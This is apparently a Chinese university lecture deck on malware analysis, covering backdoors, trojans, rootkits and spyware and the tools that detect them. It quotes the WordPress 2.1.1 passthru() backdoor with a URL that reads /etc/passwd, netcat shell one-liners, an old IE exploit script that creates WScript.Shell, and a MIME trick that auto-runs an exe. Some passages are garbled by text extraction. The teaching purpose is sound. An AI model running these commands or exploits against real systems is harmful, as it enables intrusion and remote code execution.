《后门木马rootblek基本用法及防御》由会员分享,可在线阅读,更多相关《后门木马rootblek基本用法及防御(62页珍藏版)》请在金锄头文库上搜索。
1、恶意软件的分析与防范严 飞 武汉大学计算机学院 课时安排 恶意代码概述 计算机病毒 网络蠕虫 网页/移动恶意代码 后门、木马和Rootkit 常用检测技术和工具 课堂讨论与练习 期末考试后门u后门是一个允许攻击者绕过系统中常规安 全控制机制的程序,他按照攻击者自己的 意图提供通道。u后门的重点在于为攻击者提供进入目标计 算机的通道。后门类型从功能上分类u系统级后门:在系统层能访问数据和进程u应用级后门:逃逸安全机制的合法程序u密码级后门:能够以某种方式看懂密文后门类型从控制方法分类u本地权限的提升l对系统有访问权的攻击者变换其权限等级成为管理员,然后攻击者可以 重新设置该系统或访问人和存储在系
2、统中的文件。u单个命令的远程执行l攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后门执 行攻击者的命令并将输出返回给攻击者。u远程命令行解释器访问l如远程Shell,这类后门允许攻击者通过网络快速直接地键入受害计算机 的命令提示。其比“单个命令的远程执行”要强大得多。u远程控制GUIl攻击者可以看到目标计算机的GUI,控制鼠标的移动,输入对键盘的操 作,这些都通过网络实现。后门的安装u自己植入(物理接触或入侵之后)u漏洞病毒蠕虫恶意移动代码u社会工程(欺骗受害者自己安装)Email远程共享BT下载Exampleu2001年,Borland的数据库软件Interbase 发现隐藏了七年
3、的后门,程序中包含一个 万能密码和用户名:用户名是“politically”密码是“correct”u用户包括波音、诺基亚、摩托罗拉和波士 顿股票交易所、Sun等Exampleu2007年, Wordpress 2.1.1远程命令执行后门漏洞 l黑客攻击了WordPress的下载网站,修改了代码如下l在wp-includes/theme.php文件中: function get_theme_mcommand($mcds) passthru($mcds); . if ($_GET“iz“) get_theme_mcommand($_GET“iz“); passthru()会执行通过iz变量传入的
4、PHP代码。u如攻击:http:/wordpressurl/wp-includes/theme.php? iz =cat/etc/passwd后门连接工具uNetCat:通用的网络连接工具用法一: nc l p 5000 e cmd.exe nc 127.0.0.1 5000用法二:nc l p 5000nc 127.0.0.1 5000 e cmd.exeucshell.exe其他Windows下的后门程序uCryptCatuTinil提供通向Tcp端口7777,只有3K。u曾经的一个优秀网站无端口后门-如何唤醒uICMP后门l不使用TCP/UDP协议。l使用ICMP协议进行通信。l难以检测
5、。u非混合型探测后门攻击者将触发指令发送到对方计算 机。l难以检测。(Cd00r: syn to port x, syn to port y, syn to port z)u混合型探测后门l只要攻击者将触发指令发送到对方网络中即可触发后门。l更加难以检测。 (syn to port x , syn to port x, syn to port x in different Ips)反弹式木马 反弹式木马访问客户端的80端口,防火墙无法限制。 例如,“网络神偷” GUI(Graphics User Interface)远程控制u灰鸽子u并非所有的GUI远程控制都是恶意的lVNC(Virtual
6、Network Computing)lWindows Terminal ServiceslPCAnywherelBack Orifice 2000VNCu英国剑桥大学AT x.asp; x.htmx.htmuuuuu数据装载中,可能需要10秒至30秒.uuuuux.aspu1-在cache中寻找1.bmpu2-把bmp还原为exeu3-执行exe正常网页中携带uuWindow.openuOnload, onerroruuu网页病毒、网页木马的原理 uJavascript.Exception.Exploit :JS+WSH u错误的MIME Multipurpose Internet Mail
7、Extentions,多用途的网际邮件扩充协议头. IE5.0到IE6.0 uEXE to .BMP + Javascritp.Exception.Exploit uiframe 漏洞的利用:父窗口能在子域环境下运 行脚本代码,包括任意的恶意代码 u通过安全认证的CAB,COX uEXE文件的捆绑 Javascript.Exception.Exploit uFunction destroy()try uua1=document.applets0; ua1.setCLSID(“F935DC22-1CF0-11D0-ADB9-00C04FD58A0B“); ua1.createInstance()
8、; Shl = a1.GetObject(); ua1.setCLSID(“0D43FE01-F093-11CF-8940-00A0C9054228“); ua1.createInstance(); FSO = a1.GetObject(); ua1.setCLSID(“F935DC26-1CF0-11D0-ADB9-00C04FD58A0B“); ua1.createInstance(); Net = a1.GetObject(); utry udo something; ucatch(e) ucatch(e) ufunction do() u usetTimeout(“destroy()“
9、, 1000); /设定运行时间1秒uudo() /坏事执行函数指令错误的MIME Multipurpose Internet Mail Extentions uContent-Type: multipart/related; type=“multipart/alternative“; boundary=”=B=“ -=B= Content-Type: multipart/alternative; boundary=”=A=“ -=A= Content-Type: text/html; Content-Transfer-Encoding: quoted-printable-=A=- -=B=
10、Content-Type: audio/x-wav; name=”run.exe“ -可以改为其他脚本文件 Content-Transfer-Encoding: base64 Content-ID: -以下省略AAAAA N+1个- 当申明邮件 的类型为 audio/x-wav 时,IE存在 的一个漏洞 会将附件认 为是音频文 件自动尝试 打开 iframeu iframe src=run.eml width=0 height=0 /iframe Startup.htmluuustartupuudocument.getElementById(“clientcall“).click()uuuHT
11、AuHTA的全名为HTML Applicationu u参见x.asp各种溢出型漏洞uiframe溢出 uJavaprxy.DLL COM对象堆溢出漏洞 木马的发展u加入Rootkit,隐藏文件/端口/服务/进程等uHTTP隧道uHyDan(把信息隐藏在二进制文件中)u“) Then%“ & szTempFile, 0, True)%“ method=“POST“ “木马检测工具u安天实验室:安天防线 http:/木马克星u木马克星可以查杀8122种国际木马,1053种密码 偷窃木马,保证查杀传奇密码偷窃木马,灰鸽子API 反杀病毒软件类木马,冰河类文件关联木马,密码 解霸,奇迹射手等游戏密码
12、邮寄木马,内置木马防 火墙,任何黑客程序试图发送密码邮件,都需要 Iparmor 确认,不仅可以查杀木马,更可以反查黑客 密码。间谍软件u他们以主动收集用户个人信息、相关机密 文件或隐私数据为主,搜集到的数据会主 动传送到指定服务器。u间谍软件发展之初,多被一些在线广告商以及 Kazaa等音乐交换网站使用,这些公司将一些监 控程序放在用户电脑内监视其网上行为、收集其 兴趣爱好,或者在空闲时间进行其它操作。u这些公司以让用户上网免费赚钱或免费获得音乐 为幌子,吸引了众多用户下载,而这些软件中所 带的间谍程序便悄悄地收集用户信息,然后根据 这些信息发送广告,或者把这些收集的信息转卖 给其他广告公司
13、获取利益。 间谍软件的传播方式u软件捆绑和嵌套u浏览网站(恶意网页或网页木马)u邮件发送u利用漏洞进行主动传播和植入(多隐身于蠕虫之 中)。 部分间谍和广告软件uCoolWebSearch:可能是最下流也最恶毒的程序之 一。它完全劫持了IE浏览器,害你什么事都做不成 。uPurityScan,一个显示弹出广告,声称可以发现并 删除个人电脑上的色情内容的程序。 uTransponder (vx2),一个IE“浏览器助手”,它能够 监控网络浏览 并发送相关广告。uKeenValue是一个广告程序,它收集个人信息并向 计算机用户发送广告。uPerfect Keylogger一个记录所访问过 的站点、
14、击键 的记录和鼠标的移动的工具。它记录下用户的口令 和账户等信息。发展趋势u逐渐融合了各种病毒、蠕虫、木马、甚至 Rootkit的技术和特点,无处不在,危害特 别巨大。u其会变得越来越普遍,越来越复杂。u功能越来越就有针对性和目的性。u自我隐藏技术则会越来越先进。l这将给间谍软件的检测带来巨大挑战。 间谍软件检测工具u1.Spybot Search and Destroy(简称:SpyBot S&D):能扫描你的硬盘,然后找出你硬盘里面 的广告和间谍程序,然后把这些会对你的电脑产 生危害的程序移除,支持常用的所有浏览器。u2.Spy Sweeper:让你免受间谍软件的影响,它 能在你浏览网页,
15、浏览邮件,下载软件的时候给 予你充足的保护,免受间谍软件的入侵,保护个 人的信息。间谍软件检测工具u3.Spyware Doctor:是一个先进的间谍软件、广 告软件公用程序,它可以检查并从你的电脑移走 间谍软件、广告软件、木马程序、键盘记录器和 追踪威胁。u4.SpyRemover:专门为清除悄悄安装在你的电 脑里的间谍程序而设计的一个计算机网络安全工 具。它可以帮助你快速的在系统组件中搜索已知 的间谍程序的踪迹,并可以帮助你安全的清除他 们。全面保护你的网络安全。支持多国语言。间谍软件检测工具u5.微软:AntiSpyware。u6. McAfee企业版反间谍软件。l其可有效侦测及降低遭受间谍程序(spyware) 、广告软件(adware)、色情拨号程序(dialers) 、键盘记录软件(keyloggers)、cookies文件和 远程控制程序等潜在恶意程序(PUPs)的袭击。 uAny Questions?
